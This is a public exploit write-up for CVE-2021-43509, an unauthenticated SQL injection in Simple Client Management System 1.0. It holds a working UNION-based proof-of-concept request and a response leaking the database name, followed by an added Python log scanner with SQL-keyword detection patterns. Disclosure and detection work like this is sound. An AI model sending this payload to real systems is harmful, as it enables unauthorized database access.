CVE-2021-43509: Simple-Client-Management-System-Exploit/CVE-2021-43509 at main · r4hn1/Simple-Client-Management-System-Exploit

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the id parameter in view-service.php.


# Exploit Title: Simple Client Management System 1.0 - Unauthenticated SQL injection (view_service.php)

# Date: 27/01/2022

# Exploit Author: Rahul Kalnarayan (r4hn1)

# Vendor Homepage: https://www.sourcecodester.com/

# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

# Version: 1.0

# Category: Webapps

# Tested on: Apache2+MariaDB latest version

# Description: Simple Client Management System 1.0 suffers from an SQL injection vulnerability that allows an unauthenticated user to dump the database.

Vulnerable Page: /cms/admin/maintenance/view_service.php

POC-Request

-----------------------------------

GET /cms/admin/maintenance/view_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null--+ HTTP/1.1

Host: 192.168.1.76

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:34:55 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=radrun69h6fsn08bd53b8spsvq; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1469

Connection: close

Content-Type: text/html; charset=UTF-8

<style>

#uni_modal .modal-footer{

display:none;

}

</style>

<div class="container-fluid" id="print_out">

<div id='transaction-printable-details' class='position-relative'>

<div class="row">

<fieldset class="w-100">

<div class="col-12">

<dl>

<dt class="text-info">Name:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Description:</dt>

<dd class="pl-3">cms_db</dd>

<dt class="text-info">Price:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Status:</dt>

<dd class="pl-3">

<span class="badge badge-danger rounded-pill">Inactive</span>

</dd>

</dl>

</div>

</fieldset>

</div>

</div>

</div>

<div class="form-group">

<div class="col-12">

<div class="d-flex justify-content-end align-items-center">

<button class="btn btn-dark btn-flat" type="button" id="cancel" data-dismiss="modal">Close</button>

</div>

</div>

</div>

<script>

$(function(){

$('.table td,.table th').addClass('py-1 px-2 align-middle')

})

</script>
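
One way to spot the request pattern above in web server logs, as an added example that is not part of the original exploit file or the vendor's code. It assumes Apache combined log format and that a legitimate `id` is a plain decimal integer; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path taken from this page ("Vulnerable Page").
TARGET_PATH = "/cms/admin/maintenance/view_service.php"
# Assumption: Apache "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumption: a legitimate id is a short decimal integer.
VALID_ID = re.compile(r"\d{1,10}")
# Tokens that raise the finding from "non-numeric" to "looks like SQL".
SQL_HINT = re.compile(r"(?i)\b(union|select|concat|database|sleep|information_schema)\b|--|#|/\*|'")

# Constructed sample log lines; the second carries the request shown on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jan/2022:17:30:01 +0000] "GET /cms/admin/maintenance/view_service.php?id=3 HTTP/1.1" 200 1471 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [27/Jan/2022:17:34:55 +0000] "GET /cms/admin/maintenance/view_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null--+ HTTP/1.1" 200 1469 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [27/Jan/2022:17:40:12 +0000] "GET /cms/admin/maintenance/view_service.php?id=abc HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [27/Jan/2022:17:41:00 +0000] "GET /cms/admin/?page=clients&id=1%27 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def suspicious_requests(lines):
    """Return (ip, timestamp, decoded_id, reason) for TARGET_PATH requests whose id is not a plain integer."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        if unquote(parts.path) != TARGET_PATH:
            continue
        # parse_qs percent-decodes values and turns '+' into a space; repeated id= params are all checked.
        ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
        for value in ids:
            if VALID_ID.fullmatch(value):
                continue
            reason = "sql-keywords" if SQL_HINT.search(value) else "non-numeric-id"
            findings.append((m["ip"], m["ts"], value, reason))
    return findings

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

The response on this page returned 200 with a normal-looking body, so the status code alone does not separate the injected request from a legitimate one; the decoded `id` value does.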
